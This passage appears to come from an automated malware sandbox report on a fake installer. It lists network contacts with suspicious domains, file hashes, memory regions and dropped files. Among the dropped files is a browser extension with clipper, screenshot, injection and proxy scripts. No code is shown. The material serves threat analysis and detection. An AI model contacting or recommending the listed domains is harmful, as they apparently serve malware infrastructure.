| US | 172.67.151.174:80 | death1488.com | tcp |
| US | 104.21.68.134:80 | raur94.com | tcp |
| US | 8.8.8.8:53 | iigggkkl.monster | udp |
| US | 104.21.68.134:443 | raur94.com | tcp |
| US | 188.114.97.2:443 | iigggkkl.monster | tcp |
| US | 104.21.68.134:80 | raur94.com | tcp |
| US | 188.114.97.2:443 | iigggkkl.monster | tcp |
| US | 104.21.68.134:443 | raur94.com | tcp |
| GB | 93.93.131.124:443 | the.earth.li | tcp |
| US | 104.21.68.134:80 | raur94.com | tcp |
| US | 188.114.97.2:443 | iigggkkl.monster | tcp |
| US | 104.21.68.134:443 | raur94.com | tcp |
| US | 104.21.2.229:443 | checkass.monster | tcp |
| NL | 89.105.201.188:80 | 89.105.201.188 | tcp |
| US | 8.8.8.8:53 | 188.201.105.89.in-addr.arpa | udp |
| US | 8.8.8.8:53 | nav-edge.smartscreen.microsoft.com | udp |
| US | 8.8.8.8:53 | nav-edge.smartscreen.microsoft.com | udp |
| US | 8.8.8.8:53 | business.bing.com | udp |
| US | 8.8.8.8:53 | business.bing.com | udp |
| US | 8.8.8.8:53 | api.edgeoffer.microsoft.com | udp |
| US | 8.8.8.8:53 | api.edgeoffer.microsoft.com | udp |
| GB | 172.165.69.228:443 | nav-edge.smartscreen.microsoft.com | tcp |
| US | 8.8.8.8:53 | business.bing.com | udp |
| US | 8.8.8.8:53 | business.bing.com | udp |
| US | 8.8.8.8:53 | api.edgeoffer.microsoft.com | udp |
| IE | 94.245.104.56:443 | api.edgeoffer.microsoft.com | tcp |
| IE | 94.245.104.56:443 | api.edgeoffer.microsoft.com | tcp |
| US | 8.8.8.8:53 | 42.200.250.142.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 228.69.165.172.in-addr.arpa | udp |
| US | 8.8.8.8:53 | business.bing.com | udp |
| US | 13.107.6.158:443 | business.bing.com | tcp |
| US | 8.8.8.8:53 | bzib.nelreports.net | udp |
| US | 8.8.8.8:53 | bzib.nelreports.net | udp |
| GB | 92.123.128.178:443 | www.bing.com | udp |
| US | 8.8.8.8:53 | bzib.nelreports.net | udp |
| US | 8.8.8.8:53 | bzib.nelreports.net | udp |
| US | 8.8.8.8:53 | 178.128.123.92.in-addr.arpa | udp |
| GB | 88.221.134.17:443 | bzib.nelreports.net | tcp |
| US | 8.8.8.8:53 | 17.134.221.88.in-addr.arpa | udp |
| US | 8.8.8.8:53 | blockchain.info | udp |
| US | 8.8.8.8:53 | blockchain.info | udp |
| US | 104.17.139.37:443 | blockchain.info | tcp |
| US | 8.8.8.8:53 | 37.139.17.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | dark-confusion.com | udp |
| US | 8.8.8.8:53 | dark-confusion.com | udp |
| US | 188.114.97.2:443 | dark-confusion.com | udp |
| US | 8.8.8.8:53 | edge-consumer-static.azureedge.net | udp |
| US | 8.8.8.8:53 | edge-consumer-static.azureedge.net | udp |
| US | 13.107.246.64:443 | edge-consumer-static.azureedge.net | tcp |
| US | 8.8.8.8:53 | 22.160.190.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | nw-umwatson.events.data.microsoft.com | udp |
| US | 20.189.173.21:443 | nw-umwatson.events.data.microsoft.com | tcp |
| US | 8.8.8.8:53 | 21.173.189.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | blockchain.info | udp |
| US | 8.8.8.8:53 | blockchain.info | udp |
| US | 8.8.8.8:53 | blockchain.info | udp |
| US | 104.17.141.37:443 | blockchain.info | tcp |
| US | 8.8.8.8:53 | dark-confusion.com | udp |
| US | 8.8.8.8:53 | dark-confusion.com | udp |
| US | 172.67.158.229:443 | dark-confusion.com | udp |
| US | 8.8.8.8:53 | 37.141.17.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 229.158.67.172.in-addr.arpa | udp |
| US | 8.8.8.8:53 | api.edgeoffer.microsoft.com | udp |
| US | 8.8.8.8:53 | api.edgeoffer.microsoft.com | udp |
| IE | 94.245.104.56:443 | api.edgeoffer.microsoft.com | tcp |
| US | 8.8.8.8:53 | nav-edge.smartscreen.microsoft.com | udp |
| US | 8.8.8.8:53 | nav-edge.smartscreen.microsoft.com | udp |
| GB | 172.165.69.228:443 | nav-edge.smartscreen.microsoft.com | tcp |
| IE | 94.245.104.56:443 | api.edgeoffer.microsoft.com | tcp |
Files
C:\Users\Admin\Desktop\x32_x64_installer\setup.zip
| MD5 | 7c58506247a0c7c5554caddff4cbaa79 |
| SHA1 | 6597d983d2bc026c04d4c5232a1a7ae2f3d4ffc2 |
| SHA256 | 9e392ff42eef2346a683c2896b5346a1769bc7c2c625a60c677613afe8adb323 |
| SHA512 | 4496a908877099ab9c9e7cb79b82ba1eba34128d816a242d9567d860893e05aaae0b8accb8d7a8adb0c58fab9a7c4a14357225cbddbdde827d1ac574f10cce4b |
C:\Users\Admin\Desktop\x32_x64_installer\setup\setup.msi
| MD5 | 2a612d600e5370ebccb620fdd087eaa4 |
| SHA1 | 264aa1436f653370ed3b99072f377c8904c68bcc |
| SHA256 | cf76109c76aba7474de8b50e4adabe2790a172a65994a5d7ac66bcc406e1e148 |
| SHA512 | dd6db901c971cfe6459a8588873114f6031793a62cce9c1644b7aa9b14d21dd2c30ac02cf6969846fbabf6f2e99e85f03f8e8db3407c90722b851cdc0f22a1c2 |
C:\Windows\Installer\MSID622.tmp
| MD5 | b158d8d605571ea47a238df5ab43dfaa |
| SHA1 | bb91ae1f2f7142b9099e3cc285f4f5b84de568e4 |
| SHA256 | ca763693cc25d316f14a9ebad80ebf00590329550c45adb7e5205486533c2504 |
| SHA512 | 56aef59c198acf2fcd0d95ea6e32ce1c706e5098a0800feff13ddb427bfb4d538de1c415a5cb5496b09a5825155e3abb1c13c8c37dc31549604bd4d63cb70591 |
C:\Windows\Installer\MSIEDF5.tmp
| MD5 | fb4665320c9da54598321c59cc5ed623 |
| SHA1 | 89e87b3cc569edd26b5805244cfacb2f9c892bc7 |
| SHA256 | 9fb3156c665211a0081b189142c1d1ab18cda601ee54d5f5d8883ecfa4177a59 |
| SHA512 | b205552a3cfbaa2202e6ef7e39e229af167b2342a7dc4a2f4cadfe4d05000966cf19e9e208e44d6bb0fd6a56f4283caeed9c13f523e5b301b87f79febb1840cf |
memory/224-62-0x0000000072FD0000-0x0000000073780000-memory.dmp
memory/224-63-0x0000000004E10000-0x0000000004E20000-memory.dmp
memory/224-64-0x0000000002C60000-0x0000000002C96000-memory.dmp
memory/224-65-0x0000000004E10000-0x0000000004E20000-memory.dmp
memory/224-66-0x0000000005450000-0x0000000005A78000-memory.dmp
memory/224-67-0x0000000005420000-0x0000000005442000-memory.dmp
memory/224-68-0x0000000005C20000-0x0000000005C86000-memory.dmp
memory/224-69-0x0000000005C90000-0x0000000005CF6000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_romj4si1.yj4.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
memory/224-75-0x0000000005D00000-0x0000000006054000-memory.dmp
memory/224-80-0x0000000006300000-0x000000000631E000-memory.dmp
memory/224-81-0x0000000006390000-0x00000000063DC000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\pssEFC8.ps1
| MD5 | 30c30ef2cb47e35101d13402b5661179 |
| SHA1 | 25696b2aab86a9233f19017539e2dd83b2f75d4e |
| SHA256 | 53094df6fa4e57a3265ff04bc1e970c10bcdb3d4094ad6dd610c05b7a8b79e0f |
| SHA512 | 882be2768138bb75ff7dde7d5ca4c2e024699398baacd0ce1d4619902402e054297e4f464d8cb3c22b2f35d3dabc408122c207facad64ec8014f2c54834cf458 |
memory/224-83-0x0000000004E10000-0x0000000004E20000-memory.dmp
memory/224-84-0x00000000079E0000-0x000000000805A000-memory.dmp
memory/224-85-0x00000000067A0000-0x00000000067BA000-memory.dmp
memory/224-86-0x0000000007360000-0x00000000073F6000-memory.dmp
memory/224-87-0x0000000006850000-0x0000000006872000-memory.dmp
memory/224-88-0x0000000008060000-0x0000000008604000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\scrEFB6.ps1
| MD5 | 753240f3d0c58563dcba1244db69b0d7 |
| SHA1 | 4a0f248fccc2431ece50f717cbf80f6681504932 |
| SHA256 | e77dbd670eaa228e96cb8ab002b0aa7f55a78779fb58754436ec691e6de14e5a |
| SHA512 | 03987837557d6342280d7871b19472e7c05cabc203824081f6fff38083ecef2da8135642644b598b21ee294816d1ed22d0573db04e5c739b2b08c28f7c441ae9 |
memory/224-90-0x00000000087E0000-0x00000000089A2000-memory.dmp
memory/224-91-0x0000000008EE0000-0x000000000940C000-memory.dmp
memory/224-95-0x0000000072FD0000-0x0000000073780000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\msiEFB5.txt
| MD5 | eb0046beb949b23b97dccd59c4b8f131 |
| SHA1 | c084a9c15a323cd51d24122681a494e52577487f |
| SHA256 | b6594a624b47bcac9a314993f15693e5da2a747adeccff4a996f4ab4491d5467 |
| SHA512 | 8dfdbf11e27242ab14b0997637a9c3deb47d345183c306e0a9b6d62099f4b341dec49f8369bec7ef839e4003d8c7a86267646c9f7c28b8fe9456c3c69b2aeab0 |
C:\Windows\Installer\e59d315.msi
| MD5 | 9068f6d9bb1f01026f24c0c4204ee754 |
| SHA1 | 3cf3d823e27bd8e6ed83b7932fc8f963a92b9ae0 |
| SHA256 | 981a03ee5ca30de8489f5dabd9741633f5d462e1123bfe201872df191e907058 |
| SHA512 | 3b6c0c8892153a8394afa1ad21d50cb7681d81b2582bbd445a532cfbd09c2fb486f10a763d11c8b09b9431b5b4ac22f12e74c67ff9f6ae844e7b97a26a79c9a0 |
C:\Config.Msi\e59d318.rbs
| MD5 | d4cd632952e3afae363580c5b45ce0ce |
| SHA1 | b02e082d79b14375555e3fe50f5ba7b78f0be348 |
| SHA256 | 6c2409d240e92a2e298681b09d291d2418da9133e1afb96c5dc78fe9cedf433a |
| SHA512 | 5ba59ebf0bd65913f40f07fe5c4cbd8b04cf618a5e5daa9ea40634ba80b0edd75827e3e7c9d5327ff6f34a33244250447a88b98a4effdcd545e07e382175b857 |
C:\Users\Admin\AppData\Roaming\Duwus public\AppUbw\gpg.exe
| MD5 | 35365d3713500bde4e2e1422c54f04fa |
| SHA1 | 0b24b1de060caa7be51404d82da5fef05958a1da |
| SHA256 | 5f7e7bb9b2e73abda7e46bfb8b266dbbb7fd3b87ebb253d842ffcfb56f1efe19 |
| SHA512 | 3e276b947220e56da8798245e9e7a16c9899a3842658ef409518968b137474cba7f13955287d1ff2fa7f929dc3ce75a8fd4c1f5fe58e6edb9e89986080aad375 |
C:\Users\Admin\AppData\Roaming\Duwus public\AppUbw\libassuan-0.dll
| MD5 | a2dd12a8ecef27ca0e524e9bb4bdb8f5 |
| SHA1 | a4f5718c8bc1cc1fba49332d767ad296f7156dbc |
| SHA256 | e54d43ae67352ceb170ece1fc1a219de9baf70cb71c1bf85a6c52858e2ca0ada |
| SHA512 | b35101d5454db885e4f47333365f3d3ce6ed20b94fb75f6965c6e04116967fb5179abaff92a2c20d47b634e81f5ac53e5e1f3def570dd95ae66a3663c0b1ea2c |
C:\Users\Admin\AppData\Roaming\Duwus public\AppUbw\zlib1.dll
| MD5 | 8f4cdaed2399204619310cd76fd11056 |
| SHA1 | 0f06ef5acde4f1e99a12cfc8489c1163dba910d1 |
| SHA256 | df14c4dcb9793a1298c3ef531299479c8bea32a9e8124355e6d3ba6b15416213 |
| SHA512 | 3d1e0453f10bece7b65fee3806bce9e36e2c526daa72d66774ed47684a591a978a80894b1643709e76db0adcf6f2dca189aa6413786a9b70c742ceaeec5b80dc |
C:\Users\Admin\AppData\Roaming\Duwus public\AppUbw\libsqlite3-0.dll
| MD5 | 0381964390751461a5d79d26ca7cedaa |
| SHA1 | 3b17b9dca5060f9b22920737165a6bd1de5e8941 |
| SHA256 | 7b307806698bfe2b8a81cf0d04cfd0df4a9916cba30707ce3934b9ee06bd75da |
| SHA512 | 381e6c2d49016ca2c4435526eb2ac4997f0c43c9bbe3ce56bc0ade3b5cc14677101c1297bbf2a10cec16242124a9246ca5e46003512719dc8360af007fb79b05 |
memory/4644-190-0x00000000007B0000-0x00000000007B1000-memory.dmp
C:\Users\Admin\AppData\Roaming\Duwus public\AppUbw\libnpth-0.dll
| MD5 | b7b148054a2818699d93f96139b4d0d0 |
| SHA1 | 0a5187b37bd84c19a7d2d84f328fa0adbc75123c |
| SHA256 | 25fb8e6bb4ebd62bfa478691261ea2e9486020ef52084dad0fc5ea417338d915 |
| SHA512 | 4f9938a2fb9f6c81cf0dc5d98ecda955e101b5fd52cc43fd58f0072f5ed914c0ef966cd0666c3bcc32f70d52847a5caedea40de86db28c94c8ebd35b366552c1 |
C:\Users\Admin\AppData\Roaming\Duwus public\AppUbw\libgpg-error-0.dll
| MD5 | 72498f59c8c580707a0a3839c332f51b |
| SHA1 | fb09b912912610d243066cc8b71435f689e6a449 |
| SHA256 | 51b69b17a15a4c8df35e81b9eef8b3c8eb914e8208f0ebbe9713661583cddf4d |
| SHA512 | 116956f25484e01236e5aaac2693e78dbc98e47580ac535a49582e21d69602be23f53f45945b0e94b2b0cf2825832a3e1c1f647302bd7b8398794f5579a0e022 |
memory/4644-192-0x00000000007E0000-0x0000000000805000-memory.dmp
C:\Users\Admin\AppData\Roaming\Duwus public\AppUbw\libgcrypt-20.dll
| MD5 | aa26817666196ab6124306f153510196 |
| SHA1 | 4e04d73cc0136d8fc5a2d021fa60372352f3de44 |
| SHA256 | 4e28b376b164840e9104d38b57d71826e5ea945c700e951b1317906efd4c36b5 |
| SHA512 | e49d7428c13daf7f0026eeef932e8a1f7b8013b2361333e690a30fedb0e043038311e72cfa92cc50828eec0b6881efef85c754c660955a76fd08ec9861d5210d |
memory/3400-194-0x00000000000E0000-0x0000000000108000-memory.dmp
memory/3400-195-0x00000000000E0000-0x0000000000108000-memory.dmp
memory/3400-196-0x00000000000E0000-0x0000000000108000-memory.dmp
memory/4644-197-0x0000000000400000-0x000000000054C000-memory.dmp
memory/4644-199-0x0000000065A80000-0x0000000065AAA000-memory.dmp
memory/4644-201-0x000000006A800000-0x000000006A80F000-memory.dmp
memory/4644-200-0x000000006B480000-0x000000006B4C1000-memory.dmp
memory/3400-198-0x00000000000E0000-0x0000000000108000-memory.dmp
memory/4644-202-0x0000000066580000-0x00000000666AA000-memory.dmp
memory/4644-203-0x0000000063080000-0x00000000630A9000-memory.dmp
memory/720-206-0x0000016C22D80000-0x0000016C22DA2000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | bcbd743eaed3394be4983a623649c089 |
| SHA1 | 2a5ed701863ea4eea112dfb5a725644cf53491b0 |
| SHA256 | c4537ef901e030a6ef3a9e8b4d8bb4d2fbfbc794ca2dee20f6316bbf97cd3d5c |
| SHA512 | 6927e4a6fc512f4723e7968add233688fdf212306674fea4c473c82adf7669f3c0c20399cd5c9652bfba689a13f0ed25e5897be28924107eae77d0531536b95a |
memory/720-217-0x00007FF89F8C0000-0x00007FF8A0381000-memory.dmp
memory/720-218-0x0000016C22BD0000-0x0000016C22BE0000-memory.dmp
memory/720-219-0x0000016C22BD0000-0x0000016C22BE0000-memory.dmp
memory/720-220-0x0000016C22BD0000-0x0000016C22BE0000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\hyayJVO3XOEo3m1\svchost.exe
| MD5 | a9c5924063a253f64fb86bc924be6996 |
| SHA1 | c39ba1e011318b3edf295d4bdde3d56b5de89972 |
| SHA256 | eb1b278b91a8f183f9749948abd9556ec21b03ca852c53e423d824d5d7cc3de4 |
| SHA512 | 57f0f5e8fa907d92feb6175ab32253bfef9f6acf25e5ce3273f12fd428e76a07ec7c8fc007dc2c13dc0c6841222d8874fb7e362d7cbe70f287583782cd3d311e |
memory/720-240-0x0000016C23030000-0x0000016C2304C000-memory.dmp
memory/720-268-0x0000016C23490000-0x0000016C23652000-memory.dmp
memory/720-269-0x0000016C23B90000-0x0000016C240B8000-memory.dmp
memory/720-283-0x00007FF89F8C0000-0x00007FF8A0381000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat
| MD5 | 181630975fcbb9a2f398f18a0d2a008d |
| SHA1 | c1cea6140e542decd77c91f4ff203a01f1c124d1 |
| SHA256 | 590d8b42e9919ecec00177a9deaba84285bde1aa51bfd95036b62f9e3aa90db1 |
| SHA512 | 4416f528b123099e5e4eae4bac9540a3fe1481925ffe3a81421b42d715696ae08b82323f8d38beff57d2b2b580aabc72e43db12e2f590fbe68279ab367bc2622 |
memory/3400-298-0x0000000000C10000-0x0000000000D10000-memory.dmp
memory/3400-299-0x0000000003BD0000-0x0000000003C58000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat
| MD5 | 98839119e51c0c08fe847217f8bba847 |
| SHA1 | 37bbf0e28d34b73f49d70bc92444b3b069af9353 |
| SHA256 | 32d9db13268428916788ae6766f62084432bab473f12dc23f7c03a71192663d9 |
| SHA512 | 8de1280e56257ccc2730d3d36cf7eeb7cfef37a575481c346a4969ec6810f89f701a4725f4b09af152ab2cdb2f403cba1de23b86d48f35117234c2e3de3df1f5 |
C:\Users\Admin\AppData\Local\$jN1J$s4tqb\ico.png
| MD5 | 40de419c81de274c26c63e0f23d91a3f |
| SHA1 | 3fda2c10bf0d84aa327e107730b3596fcd13d4fd |
| SHA256 | 7d1878c4a74f2b7c6deb2efb39aa4c1cef86b8792efd2022644437cad6c48af3 |
| SHA512 | a6c0a9328941b31ab92d7de6bfedb7012a66e10f1726a3648d8314a49fd37dfbed06c199db04ddf6a0da6f9d42d9a78378ea67e7399fd847d48e4427bbb0ff99 |
C:\Users\Admin\AppData\Local\$jN1J$s4tqb\src\mails\gmail.js
| MD5 | 91fa3e1f56477c9c742012da1b862cd3 |
| SHA1 | 4d5768220b6ec11e83611eb87875c0159df52118 |
| SHA256 | 84a4795f7893cd3f5c711016ec1290e6e3e517a84ca37c1fc59f39c84cf05767 |
| SHA512 | 05950accba7a74a00a8777950690f5b83926e6e6d65bfaf4aff1cc2f4d2eb9ab3b083112cf807f5e0088d5d54e3c0588264ea3fd71a2b27e84b4232bca9157ef |
C:\Users\Admin\AppData\Local\$jN1J$s4tqb\src\content\main.js
| MD5 | 02bb5c3cf4607f6757520a356ed5f809 |
| SHA1 | 896d19dc3aecfdf887345619281d49ec60748b22 |
| SHA256 | c608c392b7df42bfa4e8b44a3c1f1b4dd5539bdc13109954381c8895db0e97a1 |
| SHA512 | 47bdb38a500a87a7d9a575a684ece011f5c3e8baf7168b29482ababdd72b6124aebc38d6bc3893c49637357dcb2e14bb8ee2adf632e9777bffc2cccec6359866 |
C:\Users\Admin\AppData\Local\$jN1J$s4tqb\manifest.json
| MD5 | 5f0908db2929344266e44e98c4b967b5 |
| SHA1 | 68fa7988a9fc9b8116fa042fb58a6319580f23ac |
| SHA256 | 11dbcdb137654ecf047eabd22e0cc6b871c4ef030a8557fdcdbd48c2f105b723 |
| SHA512 | a37fc8c6d2bce7c36aa1854db07ddb23f40aa45627e28be10d8ab3357447b590c2bce9f81454570ca830ca67af27a41164322fb6f3e6bd8eb52431e2d00f04f3 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State
| MD5 | 8994dca438d2a22b9fe22f4d8c87de77 |
| SHA1 | 3ae53bf1463ce656e026359935e1282434fc524e |
| SHA256 | f86e4e4ed48f9f0e9dd52ec89e151a32a900b471cab102bffb2bc63433d3d0f3 |
| SHA512 | 9ed6388643dc97f5b729dae131d978395605d37f40b6dd1e86b4c55909b9c1ab32ebc21e5352344f1904ad7c44325a53299ee276b223be755d4933ddf8045e1b |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Secure Preferences
| MD5 | 48f7e0d082a51ad77bd58d3f190faab9 |
| SHA1 | 5c4c7e41804c104ca43e0ca3bd669934a03a0238 |
| SHA256 | f68673f9e357042d2823dc85ac144cf2e3d3843c452d001ad2023a90d1a015ad |
| SHA512 | 95420d2780bdd3c53e9a1e35401e59ce3e9d25512f20a41b8064a10ec0dbfe521c997243e086fb4e9f43cdd3a70ab33b4e8d66d878e5b01b435f01af0b4f7ff1 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences
| MD5 | cf9ca130d859672477262d68d75c5aad |
| SHA1 | 6b4b1d96a055df2613484c6e79b20b42de1011c0 |
| SHA256 | 8f56e6527caf02d77dce5aca498a66a42d731f437cc47341728c05d1eb91d130 |
| SHA512 | f82377ff3f0e32982ce04c4a460a45d621060485cff49edad7980a68fb95a70f16543c258b47365aa7fdb51fe1c8fe9bd2d933e8519e1f1dda6d012bc56df22c |
\??\pipe\crashpad_1472_DIPVJTSKJMDMYJWM
| MD5 | d41d8cd98f00b204e9800998ecf8427e |
| SHA1 | da39a3ee5e6b4b0d3255bfef95601890afd80709 |
| SHA256 | e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855 |
| SHA512 | cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e |
C:\Users\Admin\AppData\Local\$jN1J$s4tqb\src\background.js
| MD5 | 74e613e741449c83ac195b89fa584091 |
| SHA1 | 9eb52b87c35576fb0707be6a3ba4636f2cedf577 |
| SHA256 | 589a7ffba46286eb62bab2975206d94b217d4b473e0c6e4998d3cf875189716e |
| SHA512 | 4e15929e72125af7fd3c5640c24918ca573f7c2a5fd1992c6bfab69f78f951a40db4532b10645c66be312b38b2491829464758db6abdb0ba40252cf8fa85cb5b |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network\SCT Auditing Pending Reports
| MD5 | d751713988987e9331980363e24189ce |
| SHA1 | 97d170e1550eee4afc0af065b78cda302a97674c |
| SHA256 | 4f53cda18c2baa0c0354bb5f9a3ecbe5ed12ab4d8e11ba873c2f11161202b945 |
| SHA512 | b25b294cb4deb69ea00a4c3cf3113904801b6015e5956bd019a8570b1fe1d6040e944ef3cdee16d0a46503ca6e659a25f21cf9ceddc13f352a3c98138c15d6af |
memory/3400-357-0x0000000004DB0000-0x00000000051B0000-memory.dmp
memory/3400-358-0x0000000004DB0000-0x00000000051B0000-memory.dmp
memory/3400-359-0x0000000004DB0000-0x00000000051B0000-memory.dmp
memory/3400-366-0x0000000004DB0000-0x00000000051B0000-memory.dmp
memory/3400-365-0x00007FF8C1A10000-0x00007FF8C1C05000-memory.dmp
memory/3400-372-0x0000000077080000-0x0000000077295000-memory.dmp
memory/3844-373-0x0000000000A90000-0x0000000000A99000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\SmartScreen\local\uriCache
| MD5 | b6f7a6b03164d4bf8e3531a5cf721d30 |
| SHA1 | a2134120d4712c7c629cdceef9de6d6e48ca13fa |
| SHA256 | 3d6f3f8f1456d7ce78dd9dfa8187318b38e731a658e513f561ee178766e74d39 |
| SHA512 | 4b473f45a5d45d420483ea1d9e93047794884f26781bbfe5370a554d260e80ad462e7eeb74d16025774935c3a80cbb2fd1293941ee3d7b64045b791b365f2b63 |
memory/3844-389-0x0000000002760000-0x0000000002B60000-memory.dmp
memory/3400-390-0x0000000003BD0000-0x0000000003C58000-memory.dmp
memory/3844-391-0x0000000002760000-0x0000000002B60000-memory.dmp
memory/3400-392-0x0000000004DB0000-0x00000000051B0000-memory.dmp
memory/3844-393-0x00007FF8C1A10000-0x00007FF8C1C05000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Local Extension Settings\jnbdookjaigdccccilhfnijmckgmolhf\CURRENT
| MD5 | 46295cac801e5d4857d09837238a6394 |
| SHA1 | 44e0fa1b517dbf802b18faf0785eeea6ac51594b |
| SHA256 | 0f1bad70c7bd1e0a69562853ec529355462fcd0423263a3d39d6d0d70b780443 |
| SHA512 | 8969402593f927350e2ceb4b5bc2a277f3754697c1961e3d6237da322257fbab42909e1a742e22223447f3a4805f8d8ef525432a7c3515a549e984d3eff72b23 |
memory/3844-401-0x0000000077080000-0x0000000077295000-memory.dmp
memory/3844-394-0x0000000002760000-0x0000000002B60000-memory.dmp
C:\Users\Admin\AppData\Local\$jN1J$s4tqb\src\functions\getMachineInfo.js
| MD5 | b8749f5669e5b61eff9d2636d64c7395 |
| SHA1 | 9be21dcf99ad1c22b276cc0ac62a9ad05d09af5f |
| SHA256 | b9868080ce91445034c3f90da4e8a3f126384bd235408ab996767804c5e1ccfb |
| SHA512 | 72ba034462e112ea88fec3f4a2532fb7cb949e42e431de8be55b8a37bb5bc184679f59e177d9f162e4b8d7acf8a55cd67014b46e09de442853a75f0935960eb7 |
C:\Users\Admin\AppData\Local\$jN1J$s4tqb\src\functions\exchangeSettings.js
| MD5 | ed2384585afe2026230dab9e503d75d6 |
| SHA1 | f50f6f426fbe3f7609e2ab65835a538b064d608d |
| SHA256 | 06d1ca3c3fe0d82b1a75dd6a97dae45e944fd98091e76887adc7f12fbfe46949 |
| SHA512 | 4cffc3c02cb4406021fd45b1d8d2c03b8657b28fe8ee4782b7f1fcc9717975fa83993d8f000647a4f46ae397f73492c9475bf57e1a0896a32d2eb8e074715e2c |
C:\Users\Admin\AppData\Local\$jN1J$s4tqb\src\functions\settings.js
| MD5 | 4075373edbef7c32f49668cf71d0a0f0 |
| SHA1 | 46bc8492b8b5070529578a51d9f1e652de877dc4 |
| SHA256 | 2683ef8ce60567bdf4ff80ba343abbbc263d4b57fd7e7d25f362d3b19ccadbcf |
| SHA512 | a57cbb030663ad2d5ab7ce9ee2c730ad3efe8518622f1724ffa9c4c6f69da1952966d332d001d2a890ef3503065e66d4bd58fcaa582fb4f789dbfd34a9ac03b0 |
C:\Users\Admin\AppData\Local\$jN1J$s4tqb\src\functions\screenshotRules.js
| MD5 | ebb088b2b3fd11c7f4c40006f7546a5e |
| SHA1 | 9ef92b7bf483f00717633561484caeb13bc0459a |
| SHA256 | c4c7940136425b33ce5f69a72942d4bbf44b3699253c4f8caec344a7fe5f171c |
| SHA512 | 8cae952e5aaf71038eebf52a776e331f200db8ecc41a78624558bbfb769b0466d517b942e5ff7a441f0076844ea5ca327532cda5ed639c8f977df491e87d122b |
C:\Users\Admin\AppData\Local\$jN1J$s4tqb\src\functions\screenshot.js
| MD5 | 83e3e0934b07648eaff869a880f8e8d2 |
| SHA1 | 5bde733355987b0cafa00606095c0ed3d4aef9c9 |
| SHA256 | d724c92845f92b8d882a31f17b7094f4815e99f5a5f32b7aed6ad15f3d3a8b5e |
| SHA512 | 25cada6dfe9fbad91041d0332dc967055f4ad5b4e325856af7a1beec6d87c729d1a562811798b82ff4315b42b059f7f2bec9d6e406fee70c68c92f833f98b4f3 |
C:\Users\Admin\AppData\Local\$jN1J$s4tqb\src\functions\domain.js
| MD5 | ea1275ea08c1ace2c12df7b1fbdc9ec6 |
| SHA1 | 07823f2461d63842b1a40eb00f1d31af96d435ac |
| SHA256 | f6871787558819998607f6f3ac0e3e5c0178e7fd451a8551430a77b140e0ee14 |
| SHA512 | d4f9de5398e52ccb62eaa08a5aa1acfbb0db792bd90575443d9ec98cd844b58de67b853c54457116311e4f6a20afc3ce22106bf396a05726be6f8fd76fe79f20 |
C:\Users\Admin\AppData\Local\$jN1J$s4tqb\src\functions\clipper.js
| MD5 | 084c3ee93e6c89e5ab2fe1a830690631 |
| SHA1 | 1e7366d273af950fab9731465c5cd12e3d153c49 |
| SHA256 | 6f3360051868743b10f4ed348933d70f22a9574b970e28d988d5adeef4d71272 |
| SHA512 | 9449088cc6f6d2afe557120ea0d8387662811f85115676f799ca06a64aee9f6b77f46edf987409a535122ab72ad1b40d000bde1821949c50145b6d8ab8aeb8e3 |
C:\Users\Admin\AppData\Local\$jN1J$s4tqb\src\functions\proxy.js
| MD5 | 787a9cf08831c7d8aec4e5961cd4efa5 |
| SHA1 | e073fa3d89517dfe5f7b748a1e47c1b23f335031 |
| SHA256 | cf3fccbfc894657bc67d36821b1d3bcf924fd7ec101886ad9e60486ec1c51c7f |
| SHA512 | f8b365fe7a68b4ed60e30c3e7a91b9533e863cd1652d8413ee60af63218186606bc5b9ab4aa15cc6e4c0bc69b1394d8aae1cec63997ece6c53ff74f05ae98781 |
C:\Users\Admin\AppData\Local\$jN1J$s4tqb\src\functions\csp.js
| MD5 | d4bc31826fea86f7d59629f234beb7af |
| SHA1 | c9acb597c3daab33ae28ba79d78214e3868f7dfb |
| SHA256 | 3d719ce7728f5f727ccb3c8e1eabea3ad9e3744c5e9aa167a6938992d3065fc0 |
| SHA512 | fefd778cacd10328c8aec81f21eea8ea7bc10be3cbe3eeebb807d156280296d06ba2f5dec57a84bd1ddf1aacb1f6a07eff9d332a294f5d4591d5de324c5098fb |
C:\Users\Admin\AppData\Local\$jN1J$s4tqb\src\functions\injections.js
| MD5 | 7b23161290f67ff5c324269c998d5eaa |
| SHA1 | 224066999404170bd05a7ce7db081a29c9fc33f4 |
| SHA256 | e668570f5b5644cbdc25cc9d03fa9bad96d792cb0adf7f6cd95887f144a6d05e |
| SHA512 | 8ce5f7bcddc4b669c67d13405aee542555bacf72c380bc2fedf8924bd1fa4977c58c48d69885f795fa21120c5e74401cd11446f52c1caf156c18b01754d308b1 |
